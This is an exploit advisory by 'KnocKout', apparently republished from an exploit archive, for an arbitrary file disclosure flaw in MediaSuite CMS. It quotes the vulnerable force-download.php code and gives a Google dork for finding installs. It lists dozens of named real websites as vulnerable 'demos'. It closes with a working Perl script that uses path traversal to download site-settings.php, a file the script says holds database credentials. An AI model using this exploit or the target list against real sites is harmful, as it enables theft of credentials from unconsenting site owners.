MediaSuite.ca File Disclosure

MediaSuite.ca File Disclosure
http://www.securityhome.eu/exploits/exploit.php?eid=12874337365536c8edc8fe73.44028625
MediaSuite.ca File Disclosure
Article URL
exploit.php?eid=12874337365536c8edc8fe73.44028625
Author
SecurityHome.eu
Published: 22 April 2015
.__ _____ _______
| |__ / | |___ __ _ \_______ ____
| | / | | / / /_ \_ __ \_/ __
| / ^ /> < \_/ | / ___/
|___| /\____ |/__/\_ \_____ /__| \___ >
/ |__| / / /
_____________________________
/ _____/\_ _____/\_ ___
\_____ | __)_ / / http://twitter.com/h4SEC
/ | \ \____ Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y
/_______ //_______ / \______ /
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] E-Mail : [email protected]
[~] Twitter: http://twitter.com/h4SEC
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org
[~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic,
EthicalHacker and all TurkSec Group members.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : MediaSuite CMS - Artibary File Disclosure Exploit
|~Price : N/A
|~Version : All CMS
|~Software: http://www.mediasuite.ca
|~Vulnerability Style : File Disclosure
|~Vulnerability Dir : /
|~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario"
|[~]Date : "20.04.2015"
|[~]Exploit Tested on : >>>> www.mediasuite.ca ( Official Web ) <<<<<
------------------------------------------------------------------------------Info;----------------------------------------------------------------------------------------can be easily found in any database password for this "site-settings.php" will be sufficient to read
possible to read the file on the local database.
Page 1/5
MediaSuite.ca File Disclosure
http://www.securityhome.eu/exploits/exploit.php?eid=12874337365536c8edc8fe73.44028625
incorrect coding and unconscious in it causing ""force-download.php"" file.
that's laughter reason codes:)
########################################################################################
##########
file in "force-download.php"
..
..
..
$type = $_GET['type'];
$file = $_GET['file'];
if($type == "1"){
$filename = "../uploads/$file";
}
..
..
..
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename="".basename($filename)."";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();
..
...
########################################################################################
#############
------------------Demos---------------------------------------------------------------------------------------------------http://www.jarlette.com
www.mysistersplace.ca
www.donaleighs.com
www.campprospect.com
swimsafe.ca
www.jonesconsulting.com
www.parsonsadl.com
www.gtwsales.ca
www.eventspartyrental.com
www.spalumina.com
drivenmidland.ca
Page 2/5
MediaSuite.ca File Disclosure
http://www.securityhome.eu/exploits/exploit.php?eid=12874337365536c8edc8fe73.44028625
http://innisfilbaseball.com/
http://www.barriedentists.com/
www.ivorynote.ca
www.dockinabox.com
hockeytraininginstitute.com
http://www.simcoesoils.ca
midlandmensbasketball.com
www.alphalocksecurity.com
http://www.thegaragemotorsport.com
http://muskokasoils.ca
sphassociates.ca
https://rocksandgravel.ca
https://thegaragemotorsport.commandcentre.ca
http://www.bradfordsoils.ca
http://www.commercialinsiders.ca
http://www.thepricegroupsupply.com
http://fceconsultants.com
www.meandben.com
www.alkerton.com
http://www.legacylanestables.com
http://conceptofmovement.com
http://www.marshallautomotive.ca
www.loraday.com
..
..
..
and many more !
########################################################################################
##########
##############################Exploit.pl##################################################
#######
########################################################################################
##########
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title MediaSuite CMS - Artibary File Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum.
";
&help; exit();
}
sub help()
Page 3/5
MediaSuite.ca File Disclosure
http://www.securityhome.eu/exploits/exploit.php?eid=12874337365536c8edc8fe73.44028625
{
print "[+] Usaqe : perl $0 Target /path/
";
print "[+] Usage : perl $0 localhost /
";
}
print "
************************************************************************
";
print "* MediaSuite CMS - Artibary File Disclosure Exploit *
";
print "* Exploit coded by : KnocKout *
";
print "* Contact : twitter.com/h4SEC *
";
print "* -- *
";
print "*********************************************************************
";
($TargetIP, $path, $File,) = @ARGV;
$File="includes/force-download.php?type=1&file=../includes/site-settings.php";
my $url = "http://" . $TargetIP . $path . $File;
print "
Biraz Bekle.
";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "site-settings.php");
if ($request->is_success)
{
print "[+] Exploit Basarili, kodlayanin eline saglik
";
print "[+] Exploit Basarili. !
";
print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi.
";
print "[+] h4 SEC
";
print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker
";
exit();
}
else
{
Page 4/5
MediaSuite.ca File Disclosure
http://www.securityhome.eu/exploits/exploit.php?eid=12874337365536c8edc8fe73.44028625
print "[!] Exploit $url Basarisiz !
[!] ".$request->status_line."
";
exit();
}
Page 5/5